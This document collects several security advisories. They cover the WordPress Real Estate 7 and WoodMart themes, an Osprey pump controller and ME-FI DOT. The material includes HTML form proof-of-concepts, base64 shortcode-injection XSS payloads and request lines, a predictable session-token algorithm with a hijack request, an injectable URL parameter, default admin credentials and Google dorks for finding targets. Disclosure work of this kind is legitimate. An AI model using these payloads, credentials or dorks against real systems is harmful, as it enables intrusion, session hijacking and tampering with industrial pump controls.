<pre><code>==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] ==<br /><br />Report Title: WordPress Real Estate 7 Theme <= 3.3.4 - Abuse of Functionality<br />Google Dork: inurl:/wp-content/themes/realestate-7/<br />Research Date: 2023-02-10<br />Researcher: FearZzZz [ https://fearzzzz.ru ]<br />Component Vendor: Contempo Themes [ https://contempothemes.com ]<br />Vulnerable Version: <= 3.3.4<br />Component Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778<br />CVSS Base Score: 7.2 (High)<br />CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L<br />OWASP Top 10: A04: 2021 – Insecure Design<br />CWE: CWE-472<br />CVE: TBA<br /><br />=================================================================================================<br /><br />#### [ Description: ]<br /><br />The Real Estate 7 theme for WordPress is vulnerable to Abuse of Functionality via the `ctyouremail` parameter in the `/includes/ajax-submit-favorites.php` and `/includes/ajax-submit-listings.php` files in versions up to, and including, v3.3.4. This makes it possible for unauthenticated attackers to use implemented functions from the vulnerable service to invoke unintended/malicious outcomes.<br /><br /><br /><br />#### [ Impact: ]<br /><br />If a web application doesn't properly protect assumed-immutable values from modification in hidden form fields, parameters, cookies, or URLs, this can lead to modification of critical data. Improper validation of data that are user-controllable can lead to the application processing incorrect, and often malicious, input.<br /><br /><br /><br />#### [ Proof-of-Concept: ]<br /><br />```<br /><html><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="https://fearzzzz.ru/wp-content/themes/realestate-7/includes/ajax-submit-favorites.php" method="POST"><br /> <input type="hidden" name="ctsubject" value="Fear is Big Business" /><br /> <input type="hidden" name="name" value="FearZzZz" /><br /> <input type="hidden" name="email" value="fearzzzz@tutanota.com" /><br /> <input type="hidden" name="ctphone" value="no" /><br /> <input type="hidden" name="message" value="Fear is Big Business" /><br /> <input type="hidden" name="ctyouremail" value="fearzzzz@tutanota.com" /><br /> <input type="hidden" name="ctproperty" value="https://fearzzzz.ru" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br />```<br /><br /><br />```<br /><html><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="https://fearzzzz.ru/wp-content/themes/realestate-7/includes/ajax-submit-listings.php" method="POST"><br /> <input type="hidden" name="listing_id" value="451" /><br /> <input type="hidden" name="ctsubject" value="Fear is Big Business" /><br /> <input type="hidden" name="name" value="FearZzZz" /><br /> <input type="hidden" name="email" value="fearzzzz@tutanota.com" /><br /> <input type="hidden" name="ctphone" value="" /><br /> <input type="hidden" name="message" value="Fear is Big Business" /><br /> <input type="hidden" name="ctyouremail" value="fearzzzz@tutanota.com" /><br /> <input type="hidden" name="ctproperty" value="Z" /><br /> <input type="hidden" name="ctlistingstreet" value="Z" /><br /> <input type="hidden" name="ctlistingcity" value="Z" /><br /> <input type="hidden" name="ctlistingstate" value="Z" /><br /> <input type="hidden" name="ctlistingzip" value="Z" /><br /> <input type="hidden" name="ctpermalink" value="https://fearzzzz.ru" /><br /> <input type="hidden" name="ctlistingprice" value="Z" /><br /> <input type="hidden" name="ctlistingsqft" value="Z" /><br /> <input type="hidden" name="ctlistingbeds" value="" /><br /> <input type="hidden" name="ctlistingbaths" value="" /><br /> <input type="hidden" name="ctlistinglotsize" value="" /><br /> <input type="hidden" name="ctlistingmlsnumber" value="" /><br /> <input type="hidden" name="ctlistingpropertytype" value="Detached" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br />```<br /><br /><br /><br />#### [ Timeline: ]<br /><br />2023.02.08 - Real Estate 7 Theme v3.3.4 released.<br />2023.02.10 - Vulnerability has been discovered.<br />2023.02.15 - Vendor notified.<br />2023.02.16 - Chris Robinson responded that the vulnerabilities have been fixed. The release of the new version v3.3.5 is scheduled for March 6.<br /><br /><br /><br />#### [ Contacts: ]<br /><br />Website: fearzzzz.ru<br />Email: fearzzzz@tutanota.com<br />Twitter: https://twitter.com/fear_zzzz<br />Medium: https://fearzzzz.medium.com<br />GitHub: https://github.com/fearzzzz<br />YouTube: https://youtube.com/@fearzzzz<br /><br /><br /><br />#### [ Notes: ]<br /><br />Special thanks to Chris Robinson (Contempo Themes Founder & CEO) for the quick response and for the respectful communication.<br /><br /><br /><br />#### [ Disclaimer: ]<br /><br />The information provided in this report is provided "as is" without warranty of any kind. FearZzZz disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall FearZzZz be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if FearZzZz have been advised of the possibility of such damages.<br /><br />========================================================================== [ www.fearzzzz.ru ] ==<br /></code></pre>
<pre><code><br />Osprey Pump Controller 1.0.1 Predictable Session Token / Session Hijack<br /><br /><br />Vendor: ProPump and Controls, Inc.<br />Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com<br />Affected version: Software Build ID 20211018, Production 10/18/2021<br /> Mirage App: MirageAppManager, Release [1.0.1]<br /> Mirage Model 1, RetroBoard II<br /><br /><br />Summary: Providing pumping systems and automated controls for<br />golf courses and turf irrigation, municipal water and sewer,<br />biogas, agricultural, and industrial markets. Osprey: door-mounted,<br />irrigation and landscape pump controller.<br /><br />Technology hasn't changed dramatically on pump and electric motors<br />in the last 30 years. Pump station controls are a different story.<br />More than ever before, customers expect the smooth and efficient<br />operation of VFD control. Communications—monitoring, remote control,<br />and interfacing with irrigation computer programs—have become common<br />requirements. Fast and reliable accessibility through cell phones<br />has been a game changer.<br /><br />ProPump & Controls can handle any of your retrofit needs, from upgrading<br />an older relay logic system to a powerful modern PLC controller, to<br />converting your fixed speed or first generation VFD control system to<br />the latest control platform with communications capabilities.<br /><br />We use a variety of solutions, from MCI-Flowtronex and Watertronics<br />package panels to sophisticated SCADA systems capable of controlling<br />and monitoring networks of hundreds of pump stations, valves, tanks,<br />deep wells, or remote flow meters.<br /><br />User friendly system navigation allows quick and easy access to all<br />critical pump station information with no password protection unless<br />requested by the customer. Easy to understand control terminology allows<br />any qualified pump technician the ability to make basic changes without<br />support. Similar control and navigation platform compared to one of the<br />most recognized golf pump station control systems for the last twenty<br />years make it familiar to established golf service groups nationwide.<br />Reliable push button navigation and LCD information screen allows the<br />use of all existing control panel door switches to eliminate the common<br />problems associated with touchscreens.<br /><br />Global system configuration possibilities allow it to be adapted to<br />virtually any PLC or relay logic controlled pump stations being used in<br />the industrial, municipal, agricultural and golf markets that operate<br />variable or fixed speed. On board Wi-Fi and available cellular modem<br />option allows complete remote access.<br /><br />Desc: The pump controller's ELF binary Mirage_CreateSessionCode.x contains<br />a weak session token generation algorithm that can be predicted and can aid<br />in authentication and authorization bypass attacks. Further, session hijacking<br />is possible due to MitM attack exploiting clear-text transmission of sensitive<br />data including session token in URL. Session ID predictability and randomness<br />analysis of the variable areas of the Session ID was conducted and discovered<br />a predictable pattern. The low entropy is generated by using four IVs comprised<br />of username, password, ip address and hostname.<br /><br />Tested on: Apache/2.4.25 (Raspbian)<br /> Raspbian GNU/Linux 9 (stretch)<br /> GNU/Linux 4.14.79-v7+ (armv7l)<br /> Python 2.7.13 [GCC 6.3.0 20170516]<br /> GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git<br /> PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5745<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5745.php<br /><br /><br />05.01.2023<br /><br />--<br /><br /><br />sessionCode algorithm:<br />----------------------<br /><br />for i in range(0, 80):<br /> foo = ord(userName[i]) + ord(userpassWord[i]) + ord(clientIP[i]) + ord(clientHost[i])<br /> bar = foo + 7<br /> if bar < 64 && bar > 57:<br /> bar = foo + 13<br /> while bar > 90:<br /> bar = bar - 43<br /> if bar < 64 && bar > 57:<br /> bar = bar - 37<br /> sessionCode[i] += chr(bar)<br /> if sessionCode[i] == chr('\a'):<br /> sessionCode[i] = 0<br /> break<br /><br />print(sessionCode.upper())<br /><br /><br />index.php (+cmdinj):<br />--------------------<br /><br />$dataRequest=$userName." ".$userPW." ".$client_IP." ".$client_HOST;<br /> $test=exec("Mirage_CreateSessionCode.x ". $dataRequest,$outData, $retVal);<br /><br /><br />Session ID using user:password,ip,host<br />8GS1@7DB@7@@D5DKOPA@4DU4SKNH@OPNACI5JAP<br />Session ID using admin:password,ip,host<br />@DDUDFDIH@@@D5DKOPA@4DU4SKNH@OPNACI5JAP<br />First 10 bytes are the user/pass combo.<br /><br />Hijack session:<br />---------------<br /><br />GET /menu.php?menuItem=119&userName=user&sessionCode=QKC1DHM7EFCAEC49875@CPCLCEGAP5EKI<br /></code></pre>
<pre><code>==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2022 ] ==<br /><br />Report Title: WordPress WoodMart Theme <= 7.1.0 - Unauthenticated Arbitrary Shortcodes Injection<br />Google Dork: inurl:/wp-content/themes/woodmart/<br />Research Date: 2022-11-12<br />Researcher: FearZzZz [ https://fearzzzz.ru ]<br />Component Vendor: XTemos [ https://themeforest.net/user/xtemos ]<br />Vulnerable Version: <= 7.1.0<br />Component Link: https://themeforest.net/item/woodmart-woocommerce-wordpress-theme/20264492<br />CVSS Base Score: 8.1 (High)<br />CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H<br />OWASP Top 10: A03: 2021 – Injection<br />CWE: CWE-20<br />CVE: CVE-2023-25790<br /><br />=================================================================================================<br /><br />#### [ Description: ]<br /><br />The WoodMart premium theme for WordPress is vulnerable to Unauthenticated Arbitrary Shortcodes Injection in versions up to, and including, v7.1.0. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. Note that the default WordPress shortcodes are relatively secure but other installed plugins often include insecure shortcodes, which allows to assess the potential attack threat as "medium" or "high".<br /><br /><br /><br />#### [ Impact: ]<br /><br />Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.<br /><br />Malicious PHP code execution, the ability to gain full control over the attacked website, as well as retain access through the backdoor.<br /><br /><br /><br />#### [ Payloads: ]<br /><br />][vc_raw_html]PHNjcmlwdD5hbGVydChgRmVhclp6WnpgKTs8L3NjcmlwdD4=[/vc_raw_html][audio%20<br /><br />][vc_raw_js]PHNjcmlwdD5hbGVydChgRmVhclp6WnpgKTs8L3NjcmlwdD4=[/vc_raw_js][audio%20<br /><br /><br /><br />#### [ Proof-of-Concept: ]<br /><br />https://woodmart.xtemos.com/?s=][vc_raw_html]PHNjcmlwdD5hbGVydChgRmVhclp6WnpgKTs8L3NjcmlwdD4=[/vc_raw_html][audio%20&post_type=product&product_cat=lighting<br /><br /><br />GET /?s=][vc_raw_html]PHNjcmlwdD5hbGVydChgRmVhclp6WnpgKTs8L3NjcmlwdD4=[/vc_raw_html][audio%20&post_type=product&product_cat=lighting HTTP/2<br />Host: woodmart.xtemos.com<br /><br /><br /><br />#### [ Timeline: ]<br /><br />2022.11.12 - Vulnerability has been discovered.<br />2022.11.22 - Vendor notified, first contact attempt. No response.<br />2023.02.10 - Second attempt to contact the vendor. No response.<br />2023.02.13 - WoodMart Theme v7.1.0 released.<br />2023.02.13 - All the details was addressed to Envato and Patchstack. CVE ID requested.<br />2023.02.14 - Got a response from Envato, got a response from the vendor.<br />2023.02.14 - WoodMart Theme v7.1.1 released, the vulnerability has been fixed.<br /><br /><br /><br />#### [ Contacts: ]<br /><br />Website: fearzzzz.ru<br />Email: fearzzzz@tutanota.com<br />Twitter: https://twitter.com/fear_zzzz<br />Medium: https://fearzzzz.medium.com<br />GitHub: https://github.com/fearzzzz<br />YouTube: https://youtube.com/@fearzzzz<br /><br /><br /><br />#### [ Notes: ]<br /><br />Prerequisite for successful exploitation: the "Display results from blog" option must be enabled on the target website (`&xts-woodmart-options[enqueue_posts_results]=1`).<br /><br />Special thanks to Mikhail Kobzarev (https://t.me/mihdan | https://wp-digest.com) for providing the original theme files.<br /><br />Additional greetings to Kailoon (ThemeForest Senior Reviewer, https://kailoon.com) and XTemos Studio (https://themeforest.net/user/xtemos) for the prompt response.<br /><br /><br /><br />#### [ Disclaimer: ]<br /><br />The information provided in this report is provided "as is" without warranty of any kind. FearZzZz disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall FearZzZz be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if FearZzZz have been advised of the possibility of such damages.<br /><br />========================================================================== [ www.fearzzzz.ru ] ==<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ME-FI DOT SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.3(32-bit) | <br />| # Vendor : https://www.me-fi.com | <br />| # Dork : "Developed by ME-FI.COM" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] http://127.0.0.1/kohkood.com/accommodation_detail.php?rid=12 <====| inject here<br /><br />[+] http://127.0.0.1/kohkood.com/control/ <====| Login<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ME-FI DOT 2.2 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.3(32-bit) | <br />| # Vendor : https://www.me-fi.com | <br />| # Dork : "Developed by ME-FI.COM" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Login = user =admin pass = admin or user : admin pass : 1234<br /><br />[+] http://127.0.0.1/test/login <====| Login<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>